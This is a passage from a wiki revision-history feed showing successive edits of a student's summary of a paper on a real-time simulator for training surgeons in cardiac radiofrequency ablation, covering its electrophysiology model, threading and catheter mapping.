To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To locate the pathological area, the surgeon uses a system that detect the zone with the fastest activation. It's the first step to do before strating the operation. Catheters, used to mesure a potential (or a difference of potential), give a tool for the cardiologist to interpret the electrical activity of the heart. Mesure a difference of potential is better, but this can only capture a potential. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As the surgeon mainly rely on the electrophysical signals, it's really important for the model to be trusted and precise. As so, they made a fonctionality that gives the bipolar signal by doing the difference between two unipolar signal, which gives a better precision. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The mapping evolves as the catheters go on the heart. For exemple, if one touches the heart wall, the mapping will change this way, and some triangles are displayed to warn the user. When he reaches the region to operate, the cardiologist uses an AC RF signal (between 300 and 700 kHz), which is delivered in an electrode in contact with the tissue to remove. To know if the operation was a succes, the electrical conductivity of the operated area must be none. The simulation modelize that by decreasing progressively the electrical potential of the area. The trainee can also choose the power of ablation, so the operation can be faster or slower. Then, to check if the operation was a succes, the simulator inject current (by pressing a pedal) to the area, and if no abnormal activity are dectecting, it means that the ablation was a success.&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To do such a difficult and precise work, the simulator needs good hardware : i7 processor, NVidia GTX 580 GPU. A table of result reveals that to be most effictive, the rookie surgeon needs to touch the heart wall the less possible time. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As a conclusion, we can say that this simulator is really close to real time, but still needs some test in clinic to asses the model. &amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32500</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32500"/>
				<updated>2016-06-18T12:47:01Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To locate the pathological area, the surgeon uses a system that detect the zone with the fastest activation. It's the first step to do before strating the operation. Catheters, used to mesure a potential (or a difference of potential), give a tool for the cardiologist to interpret the electrical activity of the heart. Mesure a difference of potential is better, but this can only capture a potential. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As the surgeon mainly rely on the electrophysical signals, it's really important for the model to be trusted and precise. As so, they made a fonctionality that gives the bipolar signal by doing the difference between two unipolar signal, which gives a better precision. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The mapping evolves as the catheters go on the heart. For exemple, if one touches the heart wall, the mapping will change this way, and some triangles are displayed to warn the user. When he reaches the region to operate, the cardiologist uses an AC RF signal (between 300 and 700 kHz), which is delivered in an electrode in contact with the tissue to remove. To know if the operation was a succes, the electrical conductivity of the operated area must be none. The simulation modelize that by decreasing progressively the electrical potential of the area. The trainee can also choose the power of ablation, so the operation can be faster or slower. Then, to check if the operation was a succes, the simulator inject current (by pressing a pedal) to the area, and if no abnormal activity are dectecting, it means that the ablation was a success.&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To do such a difficult and precise work, the simulator needs good hardware : i7 processor, NVidia GTX 580 GPU. A table of result reveals that to be most effictive, the rookie surgeon needs to touch the heart wall the less possible time. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As a conclusion, we can say that this simulator is really close to real time, but still needs some test in clinic to asses the model.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31994</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31994"/>
				<updated>2016-06-11T12:33:51Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31993</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31993"/>
				<updated>2016-06-11T12:33:13Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31971</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31971"/>
				<updated>2016-06-06T16:02:44Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane.&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31970</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31970"/>
				<updated>2016-06-06T16:02:13Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V{{ind|m}} of the transmembrane.&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31969</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31969"/>
				<updated>2016-06-06T16:01:35Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V{{Indice|m}} of the transmembrane.&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31968</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31968"/>
				<updated>2016-06-06T15:54:24Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31935</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=31935"/>
				<updated>2016-06-05T16:27:41Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, with provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
== Applications ==&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	</feed>